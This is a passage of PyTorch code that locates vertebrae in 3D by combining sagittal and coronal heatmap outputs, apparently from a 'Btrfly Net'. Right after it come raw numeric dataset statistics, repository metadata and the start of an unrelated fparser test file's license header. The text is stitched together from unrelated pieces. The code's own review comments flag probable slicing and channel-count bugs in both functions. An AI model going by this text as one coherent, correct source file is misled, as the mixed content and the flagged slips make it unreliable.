            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][i], d2 - cor_pad[0][i] - cor_pad[1][i]
            # NOTE(review): sag has spatial dims (d0, d1), but the slice below
            # bounds them with d1 and d2 (pred_pos uses d0 and d1 here) -
            # looks like a copy-paste slip unless d0==d1 and d1==d2 always
            # hold for this branch; verify against pred_pos before relying on
            # this path.
            reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i], sag_pad[0][i]:d2 - sag_pad[1][i]]
            reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d1 - cor_pad[3][i], cor_pad[0][i]:d2 - cor_pad[1][i]]
            # (24)
            max_value_sag, max_idx_sag = torch.max(reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
            max_value_cor, max_idx_cor = torch.max(reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
            # Unflatten; sag divides by ori_d1 (its column count), cor by ori_d2.
            max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d1[i], max_idx_sag % ori_d1[i]
            max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
            for c_num in range(24):
                # x comes from sag rows, z from cor cols; the shared d1 axis
                # (y) is taken from whichever view peaked higher.
                if max_value_sag[c_num] > max_value_cor[c_num]:
                    max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_sag_x[c_num], max_idx_sag_y[c_num], max_idx_cor_y[c_num]
                    max_value[c_num] = max_value_sag[c_num]
                else:
                    max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_sag_x[c_num], max_idx_cor_x[c_num], max_idx_cor_y[c_num]
                    max_value[c_num] = max_value_cor[c_num]
        for step in range(len(threshold_label)):
            # Rescale, undo the crop displacement, then flip sub-threshold
            # entries negative: coord -> -coord - 1.
            position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][i, 0, 0])\
                                            * (2 * (max_value > threshold_label[step]).float() - 1) \
                                            - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][i, 0, 1])\
                                            * (2 * (max_value > threshold_label[step]).float() - 1) \
                                            - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][i, 0, 2])\
                                            * (2 * (max_value > threshold_label[step]).float() - 1) \
                                            - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 3] = max_value
    return position_batch
@torch.no_grad()
def pred_pos_3(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
    """
    Compute the tensor product between output_sag and output_cor,
    then use argmax to find the position of the ith vertebra in channel i.
    Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.

    For each subject, the per-channel 2D sagittal and coronal heatmaps are
    (after noise suppression and padding removal) outer-multiplied into a 3D
    volume; the argmax of the product gives the 3D position per channel.  The
    axis observed by both views is then refined with a confidence-weighted
    average of the two per-view 2D argmax coordinates.

    Parameters:
        device: torch device (only referenced by the commented-out median-blur code)
        output_sag & output_cor: output of the Btrfly Net, (B, C, H, W) each
        direction: per-subject axis order; each triple must be
            ('Z', 'Y', 'X') or ('Y', 'X', 'Z'), indicating the direction of the subject
        crop_info: dict whose 'displace' entry holds the per-subject crop offset
        spacing: voxel spacing, indexed spacing[axis][subject]
        cor_pad & sag_pad: per-view padding amounts, indexed pad[side][subject]
            (indices 0/1 pad the last image dim, 2/3 pad the middle image dim
             -- presumably left/right and top/bottom; TODO confirm against the padding code)
    Return:
        position_batch: (len(threshold_label), B, C, 4) tensor; [..., :3] is the
            position in subject space (sign-flipped and offset by -1 when the
            channel's peak fails the threshold, marking "not detected"),
            [..., 3] is the peak value
        position_batch_cor, position_batch_sag: (B, C, 3) per-view 2D argmax
            (row, col, peak value)
    """
    if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
        raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
    B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
    f_size = 7  # median-blur kernel size; only used by the commented-out denoising below
    # threshold to reduce noise
    threshold_noise = 0
    # grid of detection thresholds; one slice of position_batch per threshold
    threshold_label = torch.from_numpy(np.arange(0, 0.2, 0.005)).float()
    position_batch = torch.Tensor(len(threshold_label), B, C, 4)
    position_batch_sag = torch.Tensor(B, C, 3)
    position_batch_cor = torch.Tensor(B, C, 3)
    resolution = 1.0  # heatmap resolution (mm per pixel, presumably) -- TODO confirm
    # per-subject un-padded volume extents
    ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
    for i in range(B):
        direc = (direction[0][i], direction[1][i], direction[2][i])
        # NOTE: `&` on two bools evaluates both sides; `and` would be idiomatic
        if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
            raise Exception('Unknown direction!')
        # select ith subject
        output_cor = output_cor_batch[i, :, :, :]
        output_sag = output_sag_batch[i, :, :, :]
        # reduce the noise according to threshold (responses below 0 clamped to 0)
        reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
        reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
        # NOTE(review): only 24 channels are processed below, and the writes into
        # position_batch[..., :] require C == 24 -- confirm against the docstring's
        # "C=25".  Also, max_idx is a float tensor holding flattened indices, which
        # is exact only up to 2**24.
        max_value, max_idx = torch.zeros(24), torch.zeros(24)
        if direc == ('Z', 'Y', 'X'):
            # sag:(C, d1, d2), cor:(C, d0, d2)
            if (output_sag.shape[2] != output_cor.shape[2]):
                raise Exception("sag and cor should have an identical size in the last dimension!")
            d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
            # un-padded extents: rows of cor, rows of sag, shared columns
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][i], d2 - cor_pad[0][i] - cor_pad[1][i]
            reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
                                          sag_pad[0][i]:d2 - sag_pad[1][i]]
            reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
                                          cor_pad[0][i]:d2 - cor_pad[1][i]]
            # for c_num in range(24):
            #
            #     reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            #     reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            # (24)
            # per-channel 2D argmax of each view over the flattened image
            max_value_sag, max_idx_sag = torch.max(
                reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
            max_value_cor, max_idx_cor = torch.max(
                reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
            # unflatten to (row, col); both views share width ori_d2
            max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d2[i], max_idx_sag % ori_d2[i]
            max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
            #extend them to (d0, d1, d2)
            for c_num in range(24):
                reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d1-sag_pad[3][i], sag_pad[0][i]:d2-sag_pad[1][i]]
                reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d0-cor_pad[3][i], cor_pad[0][i]:d2-cor_pad[1][i]]
                assert reduce_noise_cor_one_cha.shape[1] == reduce_noise_sag_one_cha.shape[1]
                # broadcast sag across axis 0 and cor across axis 1, then multiply
                reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(1).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
                # find maximum value for each batch and channel
                max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
        else:
            # sag:(C, d0, d1), cor:(C, d1, d2)
            if (output_sag.shape[2] != output_cor.shape[1]):
                raise Exception("sag and cor should have an identical size in some dimension!")
            d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][i], d2 - cor_pad[0][i] - cor_pad[1][i]
            # NOTE(review): in this branch sag is (C, d0, d1) and cor is (C, d1, d2),
            # yet these slices reuse the d1/d2 (resp. d0/d2) bounds from the other
            # branch, while the per-channel slices in the loop below use d0/d1
            # (resp. d1/d2).  The two only agree when all padded views share the
            # same size -- confirm with the preprocessing/padding code.
            reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
                                          sag_pad[0][i]:d2 - sag_pad[1][i]]
            reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
                                          cor_pad[0][i]:d2 - cor_pad[1][i]]
            # for c_num in range(24):
            #
            #     reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            #     reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            # (24)
            max_value_sag, max_idx_sag = torch.max(
                reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
            max_value_cor, max_idx_cor = torch.max(
                reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
            # sag image is (rows=d0, cols=d1); cor image is (rows=d1, cols=d2)
            max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d1[i], max_idx_sag % ori_d1[i]
            max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
            #extend them to (d0, d1, d2)
            for c_num in range(24):
                reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d0 - sag_pad[3][i], sag_pad[0][i]:d1 - sag_pad[1][i]]
                reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d1 - cor_pad[3][i], cor_pad[0][i]:d2 - cor_pad[1][i]]
                # sag's column count must equal cor's row count (both are d1 un-padded)
                assert reduce_noise_cor_one_cha.shape[0] == reduce_noise_sag_one_cha.shape[1]
                reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(2).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
                # find maximum value for each batch and channel
                max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
        # translate the indexes to 3D form
        max_idx_x, max_idx_y, max_idx_z = -torch.ones(24), -torch.ones(24), -torch.ones(24)
        for c_num in range(24):
            max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = \
                max_idx[c_num] // (ori_d1[i] * ori_d2[i]), \
                (max_idx[c_num] % (ori_d1[i] * ori_d2[i])) // ori_d2[i], \
                (max_idx[c_num] % (ori_d1[i] * ori_d2[i])) % ori_d2[i]
        # refine the axis both views observe with a confidence-weighted average of
        # the two per-view argmax coordinates (replaces the hard argmax component)
        if direc == ('Z', 'Y', 'X'):
            for c_num in range(24):
                max_idx_z[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_y[c_num] * max_value_cor[c_num]) / \
                                   (max_value_sag[c_num]+max_value_cor[c_num])
                # if max_value_sag[c_num] > max_value_cor[c_num]:
                #     max_idx_z[c_num] = max_idx_sag_y[c_num]
                # else:
                #     max_idx_z[c_num] = max_idx_cor_y[c_num]
        else:
            for c_num in range(24):
                max_idx_y[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_x[c_num] * max_value_cor[c_num]) / \
                                   (max_value_sag[c_num]+ max_value_cor[c_num])
                # if max_value_sag[c_num] > max_value_cor[c_num]:
                #     max_idx_y[c_num] = max_idx_sag_y[c_num]
                # else:
                #     max_idx_y[c_num] = max_idx_cor_x[c_num]
        # convert pixel positions to subject space; channels whose peak fails the
        # threshold get their coordinates negated and shifted by -1 as a
        # "not detected" marker (note strict > here; pred_pos_4 uses >=)
        for step in range(len(threshold_label)):
            position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][i, 0, 0])\
                * (2 * (max_value > threshold_label[step]).float() - 1) \
                - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][i, 0, 1])\
                * (2 * (max_value > threshold_label[step]).float() - 1) \
                - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][i, 0, 2])\
                * (2 * (max_value > threshold_label[step]).float() - 1) \
                - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 3] = max_value
        # per-view 2D results (pixel coordinates plus peak value)
        position_batch_sag[i, :, 0] = max_idx_sag_x
        position_batch_sag[i, :, 1] = max_idx_sag_y
        position_batch_sag[i, :, 2] = max_value_sag
        position_batch_cor[i, :, 0] = max_idx_cor_x
        position_batch_cor[i, :, 1] = max_idx_cor_y
        position_batch_cor[i, :, 2] = max_value_cor
    return position_batch, position_batch_cor , position_batch_sag
@torch.no_grad()
def pred_pos_4(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
    """
    Compute the tensor product between output_sag and output_cor,
    then use argmax to find the position of the ith vertebra in channel i.
    Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.

    Variant of pred_pos_3: each sagittal channel is multiplied with EVERY
    coronal channel and the best-scoring pairing is kept (cross-channel
    search), so a label disagreement between the two views can still yield a
    detection.  The threshold comparison is >=/< here, versus >/<= in
    pred_pos_3.

    Parameters:
        device: torch device (only referenced by the commented-out median-blur code)
        output_sag & output_cor: output of the Btrfly Net, (B, C, H, W) each
        direction: per-subject axis order; each triple must be
            ('Z', 'Y', 'X') or ('Y', 'X', 'Z'), indicating the direction of the subject
        crop_info: dict whose 'displace' entry holds the per-subject crop offset
        spacing: voxel spacing, indexed spacing[axis][subject]
        cor_pad & sag_pad: per-view padding amounts, indexed pad[side][subject]
    Return:
        position_batch: (len(threshold_label), B, C, 4); [..., :3] positions in
            subject space (negated/offset by -1 when the peak fails the
            threshold), [..., 3] the peak value
        position_batch_cor, position_batch_sag: (B, C, 2) per-view 2D argmax
            (row, col); unlike pred_pos_3, peak values are not returned
    """
    if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
        raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
    B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
    f_size = 7  # median-blur kernel size; only used by the commented-out denoising below
    # threshold to reduce noise
    threshold_noise = 0
    # coarser/wider threshold grid than pred_pos_3 (0..0.4 step 0.01)
    threshold_label = torch.from_numpy(np.arange(0, 0.4, 0.01)).float()
    position_batch = torch.Tensor(len(threshold_label), B, C, 4)
    position_batch_sag = torch.Tensor(B, C, 2)
    position_batch_cor = torch.Tensor(B, C, 2)
    resolution = 1.0  # heatmap resolution (mm per pixel, presumably) -- TODO confirm
    # per-subject un-padded volume extents
    ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
    for i in range(B):
        direc = (direction[0][i], direction[1][i], direction[2][i])
        # NOTE: `&` on two bools evaluates both sides; `and` would be idiomatic
        if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
            raise Exception('Unknown direction!')
        # select ith subject
        output_cor = output_cor_batch[i, :, :, :]
        output_sag = output_sag_batch[i, :, :, :]
        # reduce the noise according to threshold (responses below 0 clamped to 0)
        reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
        reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
        # max_cor_num records which coronal channel won for each sagittal channel.
        # NOTE(review): it is computed but never returned or read afterwards.
        # Only 24 channels are processed; the writes into position_batch[..., :]
        # require C == 24 -- confirm against the docstring's "C=25".
        max_value, max_idx, max_cor_num = torch.zeros(24), torch.zeros(24), torch.zeros(24)
        if direc == ('Z', 'Y', 'X'):
            # sag:(C, d1, d2), cor:(C, d0, d2)
            if (output_sag.shape[2] != output_cor.shape[2]):
                raise Exception("sag and cor should have an identical size in the last dimension!")
            d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
            # un-padded extents: rows of cor, rows of sag, shared columns
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][
                i], d2 - cor_pad[0][i] - cor_pad[1][i]
            reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
                                          sag_pad[0][i]:d2 - sag_pad[1][i]]
            reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
                                          cor_pad[0][i]:d2 - cor_pad[1][i]]
            # for c_num in range(24):
            #
            #     reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            #     reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            # (24)
            # per-channel 2D argmax of each view over the flattened image
            max_value_sag, max_idx_sag = torch.max(
                reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
            max_value_cor, max_idx_cor = torch.max(
                reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
            # unflatten to (row, col); both views share width ori_d2
            max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d2[i], max_idx_sag % ori_d2[i]
            max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
            # extend them to (d0, d1, d2)
            # cross-channel search: pair each sagittal channel with every coronal
            # channel and keep the best product peak (O(24*24) expands)
            for c_num_sag in range(24):
                reduce_noise_sag_one_cha = reduce_noise_sag_no_padding[c_num_sag, :, :].unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                for c_num_cor in range(24):
                    reduce_noise_cor_one_cha = reduce_noise_cor_no_padding[c_num_cor, :, :].unsqueeze(1).expand(int(ori_d0[i]), int(ori_d1[i]),
                                                                                                               int(ori_d2[i]))
                    product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
                    # find maximum value for each batch and channel
                    max_value_tmp, max_idx_tmp = torch.max(product.view(-1), dim=0)
                    if max_value_tmp.cpu() > max_value[c_num_sag]:
                        max_value[c_num_sag], max_idx[c_num_sag], max_cor_num[c_num_sag] = max_value_tmp, max_idx_tmp, c_num_cor
        else:
            # sag:(C, d0, d1), cor:(C, d1, d2)
            if (output_sag.shape[2] != output_cor.shape[1]):
                raise Exception("sag and cor should have an identical size in some dimension!")
            d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][
                i], d2 - cor_pad[0][i] - cor_pad[1][i]
            # NOTE(review): these slices use d1/d2 (resp. d0/d2) although sag is
            # (C, d0, d1) and cor is (C, d1, d2) in this branch; the expand() calls
            # below then require the results to be (ori_d0, ori_d1) and
            # (ori_d1, ori_d2), which only holds if all padded views share one
            # common size -- confirm with the preprocessing/padding code.
            reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1 - sag_pad[3][i],
                                          sag_pad[0][i]:d2 - sag_pad[1][i]]
            reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0 - cor_pad[3][i],
                                          cor_pad[0][i]:d2 - cor_pad[1][i]]
            # for c_num in range(24):
            #
            #     reduce_noise_sag_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_sag_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            #     reduce_noise_cor_no_padding[c_num, :, :] = torch.tensor(cv2.medianBlur(reduce_noise_cor_no_padding[c_num, :, :].cpu().numpy(), f_size)).to(device)
            # (24)
            max_value_sag, max_idx_sag = torch.max(
                reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
            max_value_cor, max_idx_cor = torch.max(
                reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
            # sag image is (rows=d0, cols=d1); cor image is (rows=d1, cols=d2)
            max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d1[i], max_idx_sag % ori_d1[i]
            max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
            # extend them to (d0, d1, d2)
            # cross-channel search, as in the other branch
            for c_num_sag in range(24):
                reduce_noise_sag_one_cha = reduce_noise_sag_no_padding[c_num_sag, :, :].unsqueeze(2).expand(int(ori_d0[i]), int(ori_d1[i]),
                                                                                                            int(ori_d2[i]))
                for c_num_cor in range(24):
                    reduce_noise_cor_one_cha = reduce_noise_cor_no_padding[c_num_cor, :, :].unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]),
                                                                                                                int(ori_d2[i]))
                    product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
                    # find maximum value for each batch and channel
                    max_value_tmp, max_idx_tmp = torch.max(product.view(-1), dim=0)
                    if max_value_tmp.cpu() > max_value[c_num_sag]:
                        max_value[c_num_sag], max_idx[c_num_sag], max_cor_num[c_num_sag] = max_value_tmp, max_idx_tmp, c_num_cor
        # translate the indexes to 3D form
        max_idx_x, max_idx_y, max_idx_z = -torch.ones(24), -torch.ones(24), -torch.ones(24)
        for c_num in range(24):
            max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = \
                max_idx[c_num] // (ori_d1[i] * ori_d2[i]), \
                (max_idx[c_num] % (ori_d1[i] * ori_d2[i])) // ori_d2[i], \
                (max_idx[c_num] % (ori_d1[i] * ori_d2[i])) % ori_d2[i]
        # refine the axis both views observe with a confidence-weighted average
        # of the two per-view argmax coordinates
        if direc == ('Z', 'Y', 'X'):
            for c_num in range(24):
                max_idx_z[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_y[c_num] * max_value_cor[
                    c_num]) / \
                                   (max_value_sag[c_num] + max_value_cor[c_num])
                # if max_value_sag[c_num] > max_value_cor[c_num]:
                #     max_idx_z[c_num] = max_idx_sag_y[c_num]
                # else:
                #     max_idx_z[c_num] = max_idx_cor_y[c_num]
        else:
            for c_num in range(24):
                max_idx_y[c_num] = (max_idx_sag_y[c_num] * max_value_sag[c_num] + max_idx_cor_x[c_num] * max_value_cor[
                    c_num]) / \
                                   (max_value_sag[c_num] + max_value_cor[c_num])
                # if max_value_sag[c_num] > max_value_cor[c_num]:
                #     max_idx_y[c_num] = max_idx_sag_y[c_num]
                # else:
                #     max_idx_y[c_num] = max_idx_cor_x[c_num]
        # convert pixel positions to subject space; channels whose peak fails the
        # threshold get their coordinates negated and shifted by -1 as a
        # "not detected" marker (note >= here; pred_pos_3 uses strict >)
        for step in range(len(threshold_label)):
            position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][
                i, 0, 0]) \
                * (2 * (max_value >= threshold_label[step]).float() - 1) \
                - (max_value < threshold_label[step]).float()
            position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][
                i, 0, 1]) \
                * (2 * (max_value >= threshold_label[step]).float() - 1) \
                - (max_value < threshold_label[step]).float()
            position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][
                i, 0, 2]) \
                * (2 * (max_value >= threshold_label[step]).float() - 1) \
                - (max_value < threshold_label[step]).float()
            position_batch[step, i, :, 3] = max_value
        # per-view 2D argmax positions (no peak values in this variant)
        position_batch_sag[i, :, 0] = max_idx_sag_x
        position_batch_sag[i, :, 1] = max_idx_sag_y
        position_batch_cor[i, :, 0] = max_idx_cor_x
        position_batch_cor[i, :, 1] = max_idx_cor_y
    return position_batch, position_batch_cor, position_batch_sag
| 56.45614
| 164
| 0.579967
| 6,005
| 38,616
| 3.402331
| 0.034971
| 0.051686
| 0.029122
| 0.02692
| 0.930155
| 0.916157
| 0.905878
| 0.901375
| 0.901375
| 0.896383
| 0
| 0.03392
| 0.28237
| 38,616
| 684
| 165
| 56.45614
| 0.703342
| 0.137482
| 0
| 0.790598
| 0
| 0
| 0.031123
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 1
| 0.019231
| false
| 0
| 0.008547
| 0
| 0.047009
| 0.002137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b0cb06523685cabf2c7193119ffaf25a4c85d408
| 5,617
|
py
|
Python
|
src/fparser/tests/test_comment.py
|
sturmianseq/fparser
|
bf3cba3f31a72671d4d4a93b6ef4f9832006219f
|
[
"BSD-3-Clause"
] | 33
|
2017-08-18T16:31:27.000Z
|
2022-03-28T09:43:50.000Z
|
src/fparser/tests/test_comment.py
|
sturmianseq/fparser
|
bf3cba3f31a72671d4d4a93b6ef4f9832006219f
|
[
"BSD-3-Clause"
] | 319
|
2017-01-12T14:22:07.000Z
|
2022-03-23T20:53:25.000Z
|
src/fparser/tests/test_comment.py
|
sturmianseq/fparser
|
bf3cba3f31a72671d4d4a93b6ef4f9832006219f
|
[
"BSD-3-Clause"
] | 17
|
2017-10-13T07:12:28.000Z
|
2022-02-11T14:42:18.000Z
|
# Modified work Copyright (c) 2017-2018 Science and Technology
# Facilities Council
# Original work Copyright (c) 1999-2008 Pearu Peterson
# All rights reserved.
# Modifications made as part of the fparser project are distributed
# under the following license:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# --------------------------------------------------------------------
# The original software (in the f2py project) was distributed under
# the following license:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# a. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# b. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# c. Neither the name of the F2PY project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
